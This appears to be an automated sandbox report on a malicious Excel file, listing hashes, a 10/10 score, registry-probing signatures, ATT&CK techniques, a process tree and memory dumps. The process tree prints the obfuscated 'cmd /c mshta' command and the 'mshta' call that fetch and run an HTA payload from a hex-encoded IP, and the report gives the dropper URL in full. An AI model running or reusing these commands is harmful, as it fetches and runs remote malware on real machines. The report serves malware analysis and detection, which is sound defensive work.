f9a1443232b13a12bba41c02e7720278627ed24ea0988f9953b4717ff8ee6a3a

General

Target

f9a1443232b13a12bba41c02e7720278627ed24ea0988f9953b4717ff8ee6a3a.xls
Size

102KB
MD5

9a7a8c75f3b0d70677de69bb83e124b1
SHA1

1fc88cb99977b9f1cf6995e74f264661b6e4fd5c
SHA256

f9a1443232b13a12bba41c02e7720278627ed24ea0988f9953b4717ff8ee6a3a
SHA512

e9a1b7a41430c904054bd13cc73291e7021c994cd50b4c742d32b014cb6dfcef0f2a6a6e1b8aff7bbcf3c9b708d7f0cf6f3109e11e5f2fa332e20dd54d058320
SSDEEP

3072:n/k3hbdlylKsgqopeJBWhZFGkE+cL2NdAFxe53lGvFTQ3IzxgdrvxpU0OKvMB:/k3hbdlylKsgqopeJBWhZFVE+W2NdAOK

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://185.7.214.7/fer/fe3.html

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3004	376	cmd.exe	82

Blocklisted process makes network request 1 IoCs

flow	pid	Process
19	2244	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
376	EXCEL.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
376	EXCEL.EXE
376	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE
376	EXCEL.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 376 wrote to memory of 3004	376	EXCEL.EXE	84
PID 376 wrote to memory of 3004	376	EXCEL.EXE	84
PID 3004 wrote to memory of 2244	3004	cmd.exe	86
PID 3004 wrote to memory of 2244	3004	cmd.exe	86

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f9a1443232b13a12bba41c02e7720278627ed24ea0988f9953b4717ff8ee6a3a.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:376
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe3.html
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\system32\mshta.exe
    mshta http://0xb907d607/fer/fe3.html
    3⤵
    - Blocklisted process makes network request
    PID:2244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
3KB

MD5
9a290c36b17c7153af2d5d61e099d237

SHA1
c4606bc93759e008390f6a1f84361c1cfe13e2df

SHA256
6be45610726b4470fd36a677034e8583f93aa51cbf1df5ff5b7654bafe85ec33

SHA512
2ded1193d57221d0fc44b648448e9004ee9e84fb7619fc73565f3e607ec1d4ab47acbc306e9a8cf60f262fe70d09d72107a42eb64604f8a05a797278351e20fd

Download Submit
memory/376-14-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-10-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-4-0x00007FF81BC90000-0x00007FF81BCA0000-memory.dmp

Filesize
64KB

Download
memory/376-5-0x00007FF81BC90000-0x00007FF81BCA0000-memory.dmp

Filesize
64KB

Download
memory/376-2-0x00007FF81BC90000-0x00007FF81BCA0000-memory.dmp

Filesize
64KB

Download
memory/376-7-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-1-0x00007FF81BC90000-0x00007FF81BCA0000-memory.dmp

Filesize
64KB

Download
memory/376-9-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-12-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-11-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-3-0x00007FF81BC90000-0x00007FF81BCA0000-memory.dmp

Filesize
64KB

Download
memory/376-13-0x00007FF819560000-0x00007FF819570000-memory.dmp

Filesize
64KB

Download
memory/376-19-0x00007FF819560000-0x00007FF819570000-memory.dmp

Filesize
64KB

Download
memory/376-17-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-18-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-20-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-15-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-16-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-8-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-6-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-31-0x00007FF85BCAD000-0x00007FF85BCAE000-memory.dmp

Filesize
4KB

Download
memory/376-32-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-33-0x00007FF85BC10000-0x00007FF85BE05000-memory.dmp

Filesize
2.0MB

Download
memory/376-0-0x00007FF85BCAD000-0x00007FF85BCAE000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads